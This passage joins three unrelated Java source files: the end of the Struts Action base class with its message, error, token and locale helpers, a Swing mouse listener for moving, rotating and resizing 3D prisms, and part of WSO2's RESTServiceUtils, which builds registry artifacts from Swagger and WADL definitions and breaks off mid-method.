how control should be forwarded, or <code>null</code> if the response * has already been completed.</p> * * @param mapping The ActionMapping used to select this instance * @param form The optional ActionForm bean for this request (if any) * @param request The HTTP request we are processing * @param response The HTTP response we are creating * @return The forward to which control should be transferred, or * <code>null</code> if the response has been completed. * @throws Exception if the application business logic throws an * exception * @since Struts 1.1 */ public ActionForward execute(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response) throws Exception { return null; } // ---------------------------------------------------- Protected Methods /** * Adds the specified messages keys into the appropriate request attribute * for use by the &lt;html:messages&gt; tag (if messages="true" is set), * if any messages are required. Initialize the attribute if it has not * already been. Otherwise, ensure that the request attribute is not set. * * @param request The servlet request we are processing * @param messages Messages object * @since Struts 1.2.1 */ protected void addMessages(HttpServletRequest request, ActionMessages messages) { if (messages == null) { // bad programmer! *slap* return; } // get any existing messages from the request, or make a new one ActionMessages requestMessages = (ActionMessages) request.getAttribute(Globals.MESSAGE_KEY); if (requestMessages == null) { requestMessages = new ActionMessages(); } // add incoming messages requestMessages.add(messages); // if still empty, just wipe it out from the request if (requestMessages.isEmpty()) { request.removeAttribute(Globals.MESSAGE_KEY); return; } // Save the messages request.setAttribute(Globals.MESSAGE_KEY, requestMessages); } /** * Adds the specified errors keys into the appropriate request attribute * for use by the &lt;html:errors&gt; tag, if any messages are required. * Initialize the attribute if it has not already been. Otherwise, ensure * that the request attribute is not set. * * @param request The servlet request we are processing * @param errors Errors object * @since Struts 1.2.1 */ protected void addErrors(HttpServletRequest request, ActionMessages errors) { if (errors == null) { // bad programmer! *slap* return; } // get any existing errors from the request, or make a new one ActionMessages requestErrors = (ActionMessages) request.getAttribute(Globals.ERROR_KEY); if (requestErrors == null) { requestErrors = new ActionMessages(); } // add incoming errors requestErrors.add(errors); // if still empty, just wipe it out from the request if (requestErrors.isEmpty()) { request.removeAttribute(Globals.ERROR_KEY); return; } // Save the errors request.setAttribute(Globals.ERROR_KEY, requestErrors); } /** * <p>Generate a new transaction token, to be used for enforcing a single * request for a particular transaction.</p> * * @param request The request we are processing * @return The new transaction token. */ protected String generateToken(HttpServletRequest request) { return token.generateToken(request); } /** * Retrieves any existing errors placed in the request by previous * actions. This method could be called instead of creating a <code>new * ActionMessages()</code> at the beginning of an <code>Action</code>. * This will prevent saveErrors() from wiping out any existing Errors * * @param request The servlet request we are processing * @return the Errors that already exist in the request, or a new * ActionMessages object if empty. * @since Struts 1.2.1 */ protected ActionMessages getErrors(HttpServletRequest request) { ActionMessages errors = (ActionMessages) request.getAttribute(Globals.ERROR_KEY); if (errors == null) { errors = new ActionMessages(); } return errors; } /** * <p>Return the user's currently selected Locale.</p> * * @param request The request we are processing * @return The user's currently selected Locale. */ protected Locale getLocale(HttpServletRequest request) { return RequestUtils.getUserLocale(request, null); } /** * <p> Retrieves any existing messages placed in the request by previous * actions. This method could be called instead of creating a <code>new * ActionMessages()</code> at the beginning of an <code>Action</code> This * will prevent saveMessages() from wiping out any existing Messages </p> * * @param request The servlet request we are processing * @return the Messages that already exist in the request, or a new * ActionMessages object if empty. * @since Struts 1.2.1 */ protected ActionMessages getMessages(HttpServletRequest request) { ActionMessages messages = (ActionMessages) request.getAttribute(Globals.MESSAGE_KEY); if (messages == null) { messages = new ActionMessages(); } return messages; } /** * <p>Return the default message resources for the current module.</p> * * @param request The servlet request we are processing * @return The default message resources for the current module. * @since Struts 1.1 */ protected MessageResources getResources(HttpServletRequest request) { return ((MessageResources) request.getAttribute(Globals.MESSAGES_KEY)); } /** * <p>Return the specified message resources for the current module.</p> * * @param request The servlet request we are processing * @param key The key specified in the message-resources element for * the requested bundle. * @return The specified message resource for the current module. * @since Struts 1.1 */ protected MessageResources getResources(HttpServletRequest request, String key) { // Identify the current module ServletContext context = getServlet().getServletContext(); ModuleConfig moduleConfig = ModuleUtils.getInstance().getModuleConfig(request, context); // Return the requested message resources instance return (MessageResources) context.getAttribute(key + moduleConfig.getPrefix()); } /** * <p>Returns <code>true</code> if the current form's cancel button was * pressed. This method will check if the <code>Globals.CANCEL_KEY</code> * request attribute has been set, which normally occurs if the cancel * button generated by <strong>CancelTag</strong> was pressed by the user * in the current request. If <code>true</code>, validation performed by * an <strong>ActionForm</strong>'s <code>validate()</code> method will * have been skipped by the controller servlet.</p> * * <p> Since Action 1.3.0, the mapping for a cancellable Action must also have * the new "cancellable" property set to true. If "cancellable" is not set, and * the magic Cancel token is found in the request, the standard Composable * Request Processor will throw an InvalidCancelException. </p> * * @param request The servlet request we are processing * @return <code>true</code> if the cancel button was pressed; * <code>false</code> otherwise. */ protected boolean isCancelled(HttpServletRequest request) { return (request.getAttribute(Globals.CANCEL_KEY) != null); } /** * <p>Return <code>true</code> if there is a transaction token stored in * the user's current session, and the value submitted as a request * parameter with this action matches it. Returns <code>false</code> under * any of the following circumstances:</p> * * <ul> * * <li>No session associated with this request</li> * * <li>No transaction token saved in the session</li> * * <li>No transaction token included as a request parameter</li> * * <li>The included transaction token value does not match the transaction * token in the user's session</li> * * </ul> * * @param request The servlet request we are processing * @return <code>true</code> if there is a transaction token and it is * valid; <code>false</code> otherwise. */ protected boolean isTokenValid(HttpServletRequest request) { return token.isTokenValid(request, false); } /** * <p>Return <code>true</code> if there is a transaction token stored in * the user's current session, and the value submitted as a request * parameter with this action matches it. Returns <code>false</code> under * any of the following circumstances:</p> * * <ul> * * <li>No session associated with this request</li> <li>No transaction * token saved in the session</li> * * <li>No transaction token included as a request parameter</li> * * <li>The included transaction token value does not match the transaction * token in the user's session</li> * * </ul> * * @param request The servlet request we are processing * @param reset Should we reset the token after checking it? * @return <code>true</code> if there is a transaction token and it is * valid; <code>false</code> otherwise. */ protected boolean isTokenValid(HttpServletRequest request, boolean reset) { return token.isTokenValid(request, reset); } /** * <p>Reset the saved transaction token in the user's session. This * indicates that transactional token checking will not be needed on the * next request that is submitted.</p> * * @param request The servlet request we are processing */ protected void resetToken(HttpServletRequest request) { token.resetToken(request); } /** * <p>Save the specified error messages keys into the appropriate request * attribute for use by the &lt;html:errors&gt; tag, if any messages are * required. Otherwise, ensure that the request attribute is not * created.</p> * * @param request The servlet request we are processing * @param errors Error messages object * @since Struts 1.2 */ protected void saveErrors(HttpServletRequest request, ActionMessages errors) { // Remove any error messages attribute if none are required if ((errors == null) || errors.isEmpty()) { request.removeAttribute(Globals.ERROR_KEY); return; } // Save the error messages we need request.setAttribute(Globals.ERROR_KEY, errors); } /** * <p>Save the specified messages keys into the appropriate request * attribute for use by the &lt;html:messages&gt; tag (if messages="true" * is set), if any messages are required. Otherwise, ensure that the * request attribute is not created.</p> * * @param request The servlet request we are processing. * @param messages The messages to save. <code>null</code> or empty * messages removes any existing ActionMessages in the * request. * @since Struts 1.1 */ protected void saveMessages(HttpServletRequest request, ActionMessages messages) { // Remove any messages attribute if none are required if ((messages == null) || messages.isEmpty()) { request.removeAttribute(Globals.MESSAGE_KEY); return; } // Save the messages we need request.setAttribute(Globals.MESSAGE_KEY, messages); } /** * <p>Save the specified messages keys into the appropriate session * attribute for use by the &lt;html:messages&gt; tag (if messages="true" * is set), if any messages are required. Otherwise, ensure that the * session attribute is not created.</p> * * @param session The session to save the messages in. * @param messages The messages to save. <code>null</code> or empty * messages removes any existing ActionMessages in the * session. * @since Struts 1.2 */ protected void saveMessages(HttpSession session, ActionMessages messages) { // Remove any messages attribute if none are required if ((messages == null) || messages.isEmpty()) { session.removeAttribute(Globals.MESSAGE_KEY); return; } // Save the messages we need session.setAttribute(Globals.MESSAGE_KEY, messages); } /** * <p>Save the specified error messages keys into the appropriate session * attribute for use by the &lt;html:messages&gt; tag (if * messages="false") or &lt;html:errors&gt;, if any error messages are * required. Otherwise, ensure that the session attribute is empty.</p> * * @param session The session to save the error messages in. * @param errors The error messages to save. <code>null</code> or empty * messages removes any existing error ActionMessages in * the session. * @since Struts 1.3 */ protected void saveErrors(HttpSession session, ActionMessages errors) { // Remove the error attribute if none are required if ((errors == null) || errors.isEmpty()) { session.removeAttribute(Globals.ERROR_KEY); return; } // Save the errors we need session.setAttribute(Globals.ERROR_KEY, errors); } /** * <p>Save a new transaction token in the user's current session, creating * a new session if necessary.</p> * * @param request The servlet request we are processing */ protected void saveToken(HttpServletRequest request) { token.saveToken(request); } /** * <p>Set the user's currently selected <code>Locale</code> into their * <code>HttpSession</code>.</p> * * @param request The request we are processing * @param locale The user's selected Locale to be set, or null to select * the server's default Locale */ protected void setLocale(HttpServletRequest request, Locale locale) { HttpSession session = request.getSession(); if (locale == null) { locale = Locale.getDefault(); } session.setAttribute(Globals.LOCALE_KEY, locale); } }
package userinterface; import managers.PrismManager; import prisms.Cube; import prisms.Equilateral; import prisms.Pentagonal; import prisms.Prism; import shapes.Shape; import util.Matrix3; import util.PrismType; import util.Vertex; import java.awt.*; import java.awt.event.MouseEvent; import java.awt.event.MouseListener; import java.awt.geom.Path2D; import java.util.ArrayList; import java.util.List; import java.util.Timer; import java.util.TimerTask; public class PrismMouseListener implements MouseListener { private final UserInterface userInterface; private final PrismManager prismManager; private final InterfaceActions interfaceActions; private final KeyboardListener keyboardListener; private final Timer timer = new Timer(); private boolean mouseDown = false; private TimerTask dragTask = null; private int oldScreenX; private int oldScreenY; public PrismMouseListener(final UserInterface userInterface, final PrismManager prismManager, final InterfaceActions interfaceActions, final KeyboardListener keyboardListener) { this.prismManager = prismManager; this.userInterface = userInterface; this.interfaceActions = interfaceActions; this.keyboardListener = keyboardListener; this.dragTask = new TimerTask() { @Override public void run() { if (mouseDown) { Prism selectedPrism = prismManager.getSelectedPrism(); Point mousePoint = MouseInfo.getPointerInfo().getLocation(); int xChange = mousePoint.x - oldScreenX; int yChange = mousePoint.y - oldScreenY; Component selectedComponent = interfaceActions.getSelectedComponent(); if ((xChange != 0 || yChange != 0)) { if (selectedComponent == null && keyboardListener.holdingCtrl()) { System.out.println(); oldScreenX = mousePoint.x; oldScreenY = mousePoint.y; Vertex gridOrigin = userInterface.getGridOrigin(); gridOrigin.setX(gridOrigin.getX() + xChange); gridOrigin.setY(gridOrigin.getY() + yChange); userInterface.getXCordLabel().setText("X: " + (int) gridOrigin.getX()); userInterface.getYCordLabel().setText("Y: " + (int) gridOrigin.getY()); UserInterface.repaint(); } else if (selectedComponent != null) { if (selectedComponent.equals(userInterface.getMoveButton())) { if (keyboardListener.holdingCtrl()) { oldScreenX = mousePoint.x; oldScreenY = mousePoint.y; Vertex gridOrigin = userInterface.getGridOrigin(); gridOrigin.setX(gridOrigin.getX() + xChange); gridOrigin.setY(gridOrigin.getY() + yChange); userInterface.getXCordLabel().setText("X: " + (int) gridOrigin.getX()); userInterface.getYCordLabel().setText("Y: " + (int) gridOrigin.getY()); } else if (selectedPrism != null) { Vertex origin = selectedPrism.getOrigin(); if (xChange + origin.getX() < UserInterface.getWidth() / 2 && xChange + origin.getX() >= 0) { oldScreenX = mousePoint.x; origin.setX(origin.getX() + xChange); userInterface.getXOriginField().setText(" " + (int) origin.getX()); } if (yChange + origin.getY() < UserInterface.getHeight() && yChange + origin.getY() >= 0) { oldScreenY = mousePoint.y; origin.setY(origin.getY() + yChange); userInterface.getYOriginField().setText(" " + (int) origin.getY()); } } else { return; } UserInterface.repaint(); } else if (selectedComponent.equals(userInterface.getRotateButton())) { oldScreenX = mousePoint.x; oldScreenY = mousePoint.y; if (keyboardListener.holdingCtrl()) { userInterface.setHeadingValue(userInterface.getHeadingValue() + xChange); userInterface.setPitchValue(userInterface.getPitchValue() + yChange); } else if (selectedPrism != null) { selectedPrism.setHeadingValue(selectedPrism.getHeadingValue() + xChange); selectedPrism.setPitchValue(selectedPrism.getPitchValue() + yChange); } else { return; } UserInterface.repaint(); } else if (selectedComponent.equals(userInterface.getResizeButton())) { oldScreenX = mousePoint.x; oldScreenY = mousePoint.y; if (selectedPrism != null) { int averageChange = (xChange - yChange) / 2; if (selectedPrism.getType() == PrismType.CUBE) { Cube cube = (Cube) selectedPrism; if (cube.getRealLength() + averageChange >= 10) { cube.setRealLength(cube.getRealLength() + averageChange); userInterface.getLengthField().setText("" + (cube.getRealLength() + averageChange)); } } else if (selectedPrism.getType() == PrismType.EQUILATERAL) { Equilateral equilateral = (Equilateral) selectedPrism; if (equilateral.getRealLength() + averageChange >= 10) { equilateral.setRealLength(equilateral.getRealLength() + averageChange); userInterface.getLengthField().setText("" + (equilateral.getRealLength() + averageChange)); } } else if (selectedPrism.getType() == PrismType.PENTAGONAL) { Pentagonal pentagonal = (Pentagonal) selectedPrism; if (pentagonal.getRealRadius() + averageChange >= 10) { pentagonal.setRealRadius(pentagonal.getRealRadius() + averageChange); userInterface.getRadiusField().setText("" + (pentagonal.getRealRadius() + averageChange)); } if (pentagonal.getRealHeight() + averageChange >= 10) { pentagonal.setRealHeight(pentagonal.getRealHeight() + averageChange); userInterface.getHeightField().setText("" + (pentagonal.getRealHeight() + averageChange)); } } UserInterface.repaint(); } } else if (keyboardListener.holdingCtrl()) { oldScreenX = mousePoint.x; oldScreenY = mousePoint.y; Vertex gridOrigin = userInterface.getGridOrigin(); gridOrigin.setX(gridOrigin.getX() + xChange); gridOrigin.setY(gridOrigin.getY() + yChange); userInterface.getXCordLabel().setText("X: " + (int) gridOrigin.getX()); userInterface.getYCordLabel().setText("Y: " + (int) gridOrigin.getY()); UserInterface.repaint(); } } } } } }; this.timer.schedule(this.dragTask, 20, 20); } @Override public void mousePressed(MouseEvent e) { if (e.getButton() == MouseEvent.BUTTON1) { this.mouseDown = true; this.oldScreenX = e.getXOnScreen(); this.oldScreenY = e.getYOnScreen(); Prism selectedPrism = this.prismManager.getSelectedPrism(); double xGridOrigin = this.userInterface.getGridOrigin().getX(); double yGridOrigin = this.userInterface.getGridOrigin().getY(); List<Prism> prisms = this.prismManager.getPrisms(); if (!prisms.isEmpty()) { prismloop: for (int prismIndex = prisms.size() - 1; prismIndex >= 0; prismIndex--) { Prism prism = prisms.get(prismIndex); Matrix3 transform = this.userInterface.getTransform(prism); Vertex origin = prism.getOrigin(); double xOrigin = origin.getX(); double yOrigin = origin.getY(); for (Shape shape : prism.getShapes()) { List<Vertex> vertexList = new ArrayList<Vertex>(); for (Vertex vertex : shape.getVertices()) { vertexList.add(transform.transform(vertex)); } Path2D path = new Path2D.Double(); for (int i = 0; i < vertexList.size(); i++) { Vertex vertex = vertexList.get(i); vertex.setX(vertex.getX() + xOrigin + xGridOrigin); vertex.setY(vertex.getY() + yOrigin + yGridOrigin); if (i == 0) { path.moveTo(vertex.getX(), vertex.getY()); } else { path.lineTo(vertex.getX(), vertex.getY()); } } path.closePath(); if (path.contains(e.getX(), e.getY())) { if (selectedPrism == null || !selectedPrism.equals(prism)) { this.prismManager.setSelectedPrism(prism); this.userInterface.getRemoveButton().setVisible(true); this.interfaceActions.switchToPrismSelected(); } break prismloop; } } } } if (selectedPrism != null) { UserInterface.repaint(); } Component selectedComponent = this.interfaceActions.getSelectedComponent(); if (selectedComponent == null || !(selectedComponent.equals(this.userInterface.getMoveButton()) || selectedComponent.equals(this.userInterface.getRotateButton()) || selectedComponent.equals(this.userInterface.getResizeButton()))) { this.interfaceActions.switchToNoPrismSelected(); } } } @Override public void mouseReleased(MouseEvent e) { if (e.getButton() == MouseEvent.BUTTON1) { this.mouseDown = false; } } @Override public void mouseClicked(MouseEvent arg0) { } @Override public void mouseEntered(MouseEvent arg0) { } @Override public void mouseExited(MouseEvent arg0) { } }
/* * Copyright (c) 2015, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.wso2.carbon.registry.extensions.handlers.utils; import com.google.gson.JsonArray; import com.google.gson.JsonElement; import com.google.gson.JsonObject; import org.apache.axiom.om.OMAbstractFactory; import org.apache.axiom.om.OMElement; import org.apache.axiom.om.OMFactory; import org.apache.axiom.om.OMNamespace; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.wso2.carbon.context.CarbonContext; import org.wso2.carbon.registry.core.Registry; import org.wso2.carbon.registry.core.RegistryConstants; import org.wso2.carbon.registry.core.Resource; import org.wso2.carbon.registry.core.ResourceImpl; import org.wso2.carbon.registry.core.config.RegistryContext; import org.wso2.carbon.registry.core.exceptions.RegistryException; import org.wso2.carbon.registry.core.jdbc.handlers.RequestContext; import org.wso2.carbon.registry.core.utils.RegistryUtils; import org.wso2.carbon.registry.extensions.services.Utils; import org.wso2.carbon.registry.extensions.utils.CommonConstants; import org.wso2.carbon.registry.extensions.utils.CommonUtil; import javax.xml.namespace.QName; import java.util.*; /** * This class contains static methods to generate REST Service registry artifact from the swagger doc added to the * Registry. */ public class RESTServiceUtils { private static final Log log = LogFactory.getLog(RESTServiceUtils.class); private static final String OVERVIEW = "overview"; private static final String PROVIDER = "provider"; private static final String NAME = "name"; private static final String CONTEXT = "context"; private static final String VERSION = "version"; private static final String TRANSPORTS = "transports"; private static final String DESCRIPTION = "description"; private static final String URI_TEMPLATE = "uritemplate"; private static final String URL_PATTERN = "urlPattern"; private static final String AUTH_TYPE = "authType"; private static final String HTTP_VERB = "httpVerb"; private static final String ENDPOINT_URL = "endpointURL"; private static final String WADL = "wadl"; private static final String PATH_SEPERATOR = "/"; private static final String METHOD = "method"; private static final String PATH = "path"; private static final String RESOURCE = "resource"; private static OMFactory factory = OMAbstractFactory.getOMFactory(); private static OMNamespace namespace = factory.createOMNamespace(CommonConstants.SERVICE_ELEMENT_NAMESPACE, ""); private static String commonRestServiceLocation; private static String commonEndpointLocation; /** * Extracts the data from swagger and creates an REST Service registry artifact. * * @param swaggerDocObject swagger Json Object. * @param swaggerVersion swagger version. * @param resourceObjects swagger resource object list. * @return The API metadata * @throws RegistryException If swagger content is invalid. */ public static OMElement createRestServiceArtifact(JsonObject swaggerDocObject, String swaggerVersion, String endpointURL, List<JsonObject> resourceObjects) throws RegistryException { if(swaggerDocObject == null || swaggerVersion == null) { throw new IllegalArgumentException("Arguments are invalid. cannot create the REST service artifact. "); } OMElement data = factory.createOMElement(CommonConstants.SERVICE_ELEMENT_ROOT, namespace); OMElement overview = factory.createOMElement(OVERVIEW, namespace); OMElement provider = factory.createOMElement(PROVIDER, namespace); OMElement name = factory.createOMElement(NAME, namespace); OMElement context = factory.createOMElement(CONTEXT, namespace); OMElement apiVersion = factory.createOMElement(VERSION, namespace); OMElement endpoint = factory.createOMElement(ENDPOINT_URL, namespace); OMElement transports = factory.createOMElement(TRANSPORTS, namespace); OMElement description = factory.createOMElement(DESCRIPTION, namespace); List<OMElement> uriTemplates = null; JsonObject infoObject = swaggerDocObject.get(SwaggerConstants.INFO).getAsJsonObject(); //get api name. String apiName = getChildElementText(infoObject, SwaggerConstants.TITLE).replaceAll("\\s", ""); name.setText(apiName); context.setText("/" + apiName); //get api description. description.setText(getChildElementText(infoObject, SwaggerConstants.DESCRIPTION)); //get api provider. (Current logged in user) : Alternative - CurrentSession.getUser(); provider.setText(CarbonContext.getThreadLocalCarbonContext().getUsername()); endpoint.setText(endpointURL); if (SwaggerConstants.SWAGGER_VERSION_2.equals(swaggerVersion)) { apiVersion.setText(getChildElementText(infoObject, SwaggerConstants.VERSION)); transports.setText(getChildElementText(swaggerDocObject, SwaggerConstants.SCHEMES)); uriTemplates = createURITemplateFromSwagger2(swaggerDocObject); } else if (SwaggerConstants.SWAGGER_VERSION_12.equals(swaggerVersion)) { apiVersion.setText(getChildElementText(swaggerDocObject, SwaggerConstants.API_VERSION)); uriTemplates = createURITemplateFromSwagger12(resourceObjects); } overview.addChild(provider); overview.addChild(name); overview.addChild(context); overview.addChild(apiVersion); overview.addChild(transports); overview.addChild(description); overview.addChild(endpoint); data.addChild(overview); if (uriTemplates != null) { for (OMElement uriTemplate : uriTemplates) { data.addChild(uriTemplate); } } return data; } /** * Extracts the data from wadl and creates an REST Service registry artifact. * * @param wadlElement wadl content. * @param wadlName wadl name. * @param version wadl version. * @param wadlPath wadl path. * @return REST Service element. */ public static OMElement createRestServiceArtifact(OMElement wadlElement, String wadlName, String version, String wadlPath) { if(wadlElement == null) { throw new IllegalArgumentException("WADL content cannot be null." ); } OMElement data = factory.createOMElement(CommonConstants.SERVICE_ELEMENT_ROOT, namespace); OMElement overview = factory.createOMElement(OVERVIEW, namespace); OMElement provider = factory.createOMElement(PROVIDER, namespace); OMElement name = factory.createOMElement(NAME, namespace); OMElement context = factory.createOMElement(CONTEXT, namespace); OMElement apiVersion = factory.createOMElement(VERSION, namespace); OMElement endpoint = factory.createOMElement(ENDPOINT_URL, namespace); OMElement transports = factory.createOMElement(TRANSPORTS, namespace); OMElement wadl = factory.createOMElement(WADL, namespace); List<OMElement> uriTemplates = null; provider.setText(CarbonContext.getThreadLocalCarbonContext().getUsername()); String serviceName = wadlName.contains(".") ? wadlName.substring(0, wadlName.lastIndexOf(".")) : wadlName; name.setText(serviceName); context.setText("/"+serviceName); apiVersion.setText(version); wadl.setText(wadlPath); OMNamespace wadlNamespace = wadlElement.getNamespace(); String wadlNamespaceURI = wadlNamespace.getNamespaceURI(); String wadlNamespacePrefix = wadlNamespace.getPrefix(); OMElement resourcesElement = wadlElement.getFirstChildWithName(new QName(wadlNamespaceURI, "resources", wadlNamespacePrefix)); if(resourcesElement != null) { String endpointUrl = resourcesElement.getAttributeValue(new QName("base")); endpoint.setText(endpointUrl); if(endpointUrl != null) { transports.setText(endpointUrl.substring(0, endpointUrl.indexOf("://"))); } uriTemplates = createURITemplateFromWADL(resourcesElement); } else { log.warn("WADL does not contains any resource paths. "); } overview.addChild(provider); overview.addChild(name); overview.addChild(context); overview.addChild(apiVersion); overview.addChild(transports); overview.addChild(wadl); overview.addChild(endpoint); data.addChild(overview); if (uriTemplates != null) { for (OMElement uriTemplate : uriTemplates) { data.addChild(uriTemplate); } } return data; } /** * Saves the REST Service registry artifact created from the imported swagger definition. * * @param requestContext information about current request. * @param data service artifact metadata. * @throws RegistryException If a failure occurs when adding the api to registry. */ public static String addServiceToRegistry(RequestContext requestContext, OMElement data) throws RegistryException { if(requestContext == null || data == null) { throw new IllegalArgumentException("Some or all of the arguments may be null. Cannot add the rest service to registry. "); } Registry registry = requestContext.getRegistry(); //Creating new resource. Resource serviceResource = new ResourceImpl(); //setting API media type. serviceResource.setMediaType(CommonConstants.REST_SERVICE_MEDIA_TYPE); serviceResource.setProperty(CommonConstants.SOURCE_PROPERTY, CommonConstants.SOURCE_AUTO); OMElement overview = data.getFirstChildWithName(new QName(CommonConstants.SERVICE_ELEMENT_NAMESPACE, OVERVIEW)); String serviceVersion = overview.getFirstChildWithName(new QName(CommonConstants.SERVICE_ELEMENT_NAMESPACE, VERSION)).getText(); String apiName = overview.getFirstChildWithName(new QName(CommonConstants.SERVICE_ELEMENT_NAMESPACE, NAME)).getText(); serviceVersion = (serviceVersion == null) ? CommonConstants.SERVICE_VERSION_DEFAULT_VALUE : serviceVersion; String serviceProvider = CarbonContext.getThreadLocalCarbonContext().getUsername(); String pathExpression = getRestServicePath(requestContext, data, apiName, serviceProvider); //set version property. serviceResource.setProperty(RegistryConstants.VERSION_PARAMETER_NAME, serviceVersion); //copy other property serviceResource.setProperties(copyProperties(requestContext)); //set content. serviceResource.setContent(RegistryUtils.encodeString(data.toString())); String resourceId = serviceResource.getUUID(); //set resource UUID resourceId = (resourceId == null) ? UUID.randomUUID().toString() : resourceId; serviceResource.setUUID(resourceId); String servicePath = getChrootedServiceLocation(requestContext.getRegistryContext()) + CarbonContext.getThreadLocalCarbonContext().getUsername() + RegistryConstants.PATH_SEPARATOR + apiName + RegistryConstants.PATH_SEPARATOR + serviceVersion + RegistryConstants.PATH_SEPARATOR + apiName + "-rest_service"; //saving the api resource to repository. registry.put(pathExpression, serviceResource); String defaultLifeCycle = CommonUtil.getDefaultLifecycle(registry, "restservice"); if (defaultLifeCycle != null && !defaultLifeCycle.isEmpty()) { registry.associateAspect(serviceResource.getId(), defaultLifeCycle); } if (log.isDebugEnabled()){ log.debug("REST Service created at " + pathExpression); } return pathExpression; } /** * Generate REST service path * @param requestContext Request Context * @param data REST Service content(OMElement) * @param serviceName REST Service name * @param serviceProvider Service Provider(current user) * @return Populated Path */ private static String getRestServicePath(RequestContext requestContext, OMElement data, String serviceName, String serviceProvider) { String pathExpression = Utils.getRxtService().getStoragePath(CommonConstants.REST_SERVICE_MEDIA_TYPE); pathExpression = CommonUtil.replaceExpressionOfPath(pathExpression, "name", serviceName); pathExpression = RegistryUtils.getAbsolutePath(requestContext.getRegistryContext(), CommonUtil .getPathFromPathExpression(pathExpression, data, requestContext.getResource().getProperties())); pathExpression = CommonUtil .getPathFromPathExpression(pathExpression, requestContext.getResource().getProperties(), null); pathExpression = RegistryUtils.getAbsolutePath(requestContext.getRegistryContext(), CommonUtil .replaceExpressionOfPath(pathExpression, "provider", serviceProvider)); return CommonUtil.getRegistryPath(requestContext.getRegistry().getRegistryContext(), pathExpression); } /** * Adds the service endpoint element to the registry. * * @param requestContext current request information. * @param endpointElement endpoint metadata element. * @param endpointPath endpoint location. * @return The resource path of the endpoint. * @throws RegistryException If fails to add the endpoint to the registry. */ public static String addEndpointToRegistry(RequestContext requestContext, OMElement endpointElement, String endpointPath) throws RegistryException { if(requestContext == null || endpointElement == null || endpointPath == null) { throw new IllegalArgumentException("Some or all of the arguments may be null. Cannot add the endpoint to registry. "); } endpointPath = getEndpointPath(requestContext, endpointElement, endpointPath); Registry registry = requestContext.getRegistry(); //Creating new resource. Resource endpointResource = new ResourceImpl(); //setting endpoint media type. endpointResource.setMediaType(CommonConstants.ENDPOINT_MEDIA_TYPE); //set content. endpointResource.setContent(RegistryUtils.encodeString(endpointElement.toString())); //copy other property endpointResource.setProperties(copyProperties(requestContext)); //set path //endpointPath = getChrootedEndpointLocation(requestContext.getRegistryContext()) + endpointPath; String resourceId = endpointResource.getUUID(); //set resource UUID resourceId = (resourceId == null) ? UUID.randomUUID().toString() : resourceId; endpointResource.setUUID(resourceId); //saving the api resource to repository. registry.put(endpointPath, endpointResource); if (log.isDebugEnabled()){ log.debug("Endpoint created at " + endpointPath); } return endpointPath; } /** * This method used to generate endpoint path * @param requestContext Request Context * @param endpointElement Endpoint XML element * @param endpointPath Current endpoint path * @return Updated endpoint path; */ private static String getEndpointPath(RequestContext requestContext, OMElement endpointElement, String endpointPath) { String pathExpression = Utils.getRxtService().getStoragePath(CommonConstants.ENDPOINT_MEDIA_TYPE); pathExpression = CommonUtil.getPathFromPathExpression(pathExpression, endpointElement, requestContext.getResource().getProperties()); endpointPath = CommonUtil.replaceExpressionOfPath(pathExpression, "name", endpointPath); return CommonUtil.getRegistryPath(requestContext.getRegistry().getRegistryContext(), endpointPath); } /** * Returns a Json element as a string * * @param object json Object * @param key element key * @return Element value */ private static String getChildElementText(JsonObject object, String key) { JsonElement element = object.get(key); if (element != null) { return object.get(key).getAsString(); } return null; } /** * Contains the logic to create URITemplate XML Element from the swagger 1.2 resource. * * @param resourceObjects the path resource documents. * @return URITemplate element. */ private static List<OMElement> createURITemplateFromSwagger12(List<JsonObject> resourceObjects) { List<OMElement> uriTemplates = new ArrayList<>(); for (JsonObject resourceObject : resourceObjects) { JsonArray pathResources = resourceObject.getAsJsonArray(SwaggerConstants.APIS); //Iterating through the Paths for (JsonElement pathResource : pathResources) { JsonObject path = pathResource.getAsJsonObject(); String pathText = path.get(SwaggerConstants.PATH).getAsString(); JsonArray methods = path.getAsJsonArray(SwaggerConstants.OPERATIONS); //Iterating through HTTP methods (Actions) for (JsonElement method : methods) { JsonObject methodObj = method.getAsJsonObject(); OMElement uriTemplateElement = factory.createOMElement(URI_TEMPLATE, namespace); OMElement urlPatternElement = factory.createOMElement(URL_PATTERN, namespace); OMElement httpVerbElement = factory.createOMElement(HTTP_VERB, namespace); OMElement authTypeElement = factory.createOMElement(AUTH_TYPE, namespace); urlPatternElement.setText(pathText); httpVerbElement.setText(methodObj.get(SwaggerConstants.METHOD).getAsString()); //Adding urlPattern element to URITemplate element. uriTemplateElement.addChild(urlPatternElement); uriTemplateElement.addChild(httpVerbElement); uriTemplateElement.addChild(authTypeElement); uriTemplates.add(uriTemplateElement); } } } return uriTemplates; } /** * Contains the logic to create URITemplate XML Element from the swagger 2.0 resource. * * @param swaggerDocObject swagger document * @return URITemplate element. */ private static List<OMElement> createURITemplateFromSwagger2(JsonObject swaggerDocObject) { List<OMElement> uriTemplates = new ArrayList<>(); JsonObject paths = swaggerDocObject.get(SwaggerConstants.PATHS).getAsJsonObject(); Set<Map.Entry<String, JsonElement>> pathSet = paths.entrySet(); for (Map.Entry path : pathSet) { JsonObject urlPattern = ((JsonElement) path.getValue()).getAsJsonObject(); String pathText = path.getKey().toString(); Set<Map.Entry<String, JsonElement>> operationSet = urlPattern.entrySet(); for (Map.Entry operationEntry : operationSet) { OMElement uriTemplateElement = factory.createOMElement(URI_TEMPLATE, namespace); OMElement urlPatternElement = factory.createOMElement(URL_PATTERN, namespace); OMElement httpVerbElement = factory.createOMElement(HTTP_VERB, namespace); OMElement authTypeElement = factory.createOMElement(AUTH_TYPE, namespace); urlPatternElement.setText(pathText); httpVerbElement.setText(operationEntry.getKey().toString()); uriTemplateElement.addChild(urlPatternElement); uriTemplateElement.addChild(httpVerbElement); uriTemplateElement.addChild(authTypeElement); uriTemplates.add(uriTemplateElement); } } return uriTemplates; } /** * Contains the logic to create URITemplate XML Element from wadl resource. * * @param resourcesElement wadl document * @return URITemplate element. */ private static List<OMElement> createURITemplateFromWADL(OMElement resourcesElement) { List<OMElement> 